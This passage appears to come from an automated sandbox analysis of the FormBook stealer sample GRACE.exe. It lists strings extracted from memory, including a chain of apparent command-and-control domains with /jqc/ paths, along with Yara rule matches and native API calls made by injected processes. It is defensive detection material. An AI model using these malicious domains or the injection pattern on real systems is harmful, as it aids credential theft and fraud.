c4 b5 d8 d6 b7 c0 b8 d6 d0 cf d4 ca be b5 c4 cd f8 d5 be b5 d8 d6 b7 b5 c4 c6 b4 d0 b4 ba cd b8 f1 ca bd d5 fd c8 b7 ce de ce f3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c8 e7 b9 fb cd a8 b9 fd b5 a5 bb f7 c1 b4 bd d3 b6 f8 b5 bd b4 ef c1 cb b8 c3 cd f8 d2 b3 a3 ac c7 eb d3 eb cd f8 d5 be b9 dc c0 ed d4 b1 c1 aa cf b5 a3 ac cd a8 d6 aa cb fb c3 c7 b8 c3 c1 b4 bd d3 b5 c4 b8 f1 ca bd b2 bb d5 fd c8 b7 a1 a3 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b5 a5 bb f7 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e ba f3 cd cb 3c 2f 61 3e b0 b4 c5 a5 b3 a2 ca d4 c1 ed d2 bb b8 f6 c1 b4 bd d3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 b4 ed ce f3 20 34 30 34 20 2d 20 ce c4 bc fe bb f2 c4 bf c2 bc ce b4 d5 d2 b5 bd a1 a3 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 d0 c5 cf a2 b7 fe ce f1 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e bc bc ca f5 d0 c5 cf a2 a3 a8 ce aa bc bc ca f5 d6 a7 b3 d6 c8 cb d4 b1 cc e1 b9 a9 a3 a9 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e d7
          Source: explorer.exe, 00000010.00000003.552552225.000000000F704000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmpString found in binary or memory: http://ns.adb
          Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
          Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
          Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
          Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
          Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/www.luxusgrotte.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.dl888.net
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.dl888.net/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.dl888.net/jqc/www.hongreng.xyz
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.dl888.netReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.fitdramas.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.fitdramas.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.fitdramas.com/jqc/www.szyulics.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.fitdramas.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyz
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyz/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyz/jqc/www.hotvidzhub.download
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hongreng.xyzReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/www.kornteengoods.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.downloadReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.net
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.net/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.net/jqc/www.fitdramas.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kimberlygoedhart.netReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/www.ludisenofloral.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.com/jqc/www.11sxsx.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.ludisenofloral.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.com/jqc/www.sterlworldshop.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.luxusgrotte.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/www.quintred.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/www.kimberlygoedhart.net
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/www.internetmarkaching.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.comReferer:
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.com/jqc/M
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.szyulics.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.com/jqc/
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.com/jqc/www.novergi.com
          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
          Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpString found in binary or memory: https://www.google.comT

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419D5D NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E0B NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013799D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013795F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373A710 NtOpenProcessToken,
